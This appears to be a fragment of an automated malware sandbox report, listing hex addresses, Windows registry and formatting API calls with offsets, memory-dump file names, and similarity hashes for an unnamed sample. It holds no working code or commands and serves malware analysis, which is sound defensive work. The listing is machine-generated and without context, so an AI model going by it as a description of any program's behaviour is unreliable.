                                0x0220541b
                                0x00000000
                                0x02205420
                                0x02205408
                                0x00000000

                                APIs
                                • wsprintfA.USER32 ref: 02205153
                                • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000004), ref: 0220518F
                                • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000400), ref: 022051D1
                                • RegCloseKey.ADVAPI32(?), ref: 0220543A
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.317172937.0000000002200000.00000040.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: true
                                • Associated: 00000000.00000002.317150458.00000000021E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317383685.0000000002287000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317494222.000000000228A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317561703.000000000228D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317580917.0000000002295000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Similarity
                                • API ID: QueryValue$Closewsprintf
                                • String ID: alfoC:\Windows\
                                • API String ID: 3301640424-2437302347
                                • Opcode ID: 0da247c220352003379e2b18c4629bbd07f54c50f70b642b11556eab6fec603d
                                • Instruction ID: 1b2878d7b3e240e48029f4699335c5deedd38e7a8cb1b6bc5ed30cc7f19e0f6a
                                • Opcode Fuzzy Hash: 0da247c220352003379e2b18c4629bbd07f54c50f70b642b11556eab6fec603d
                                • Instruction Fuzzy Hash: B1F03C719111289BDB20DB90CD84AEAF3B8BB58304F4845C8A629A6185C7719BE8CF54
                                Uniqueness

                                Uniqueness Score: -1.00%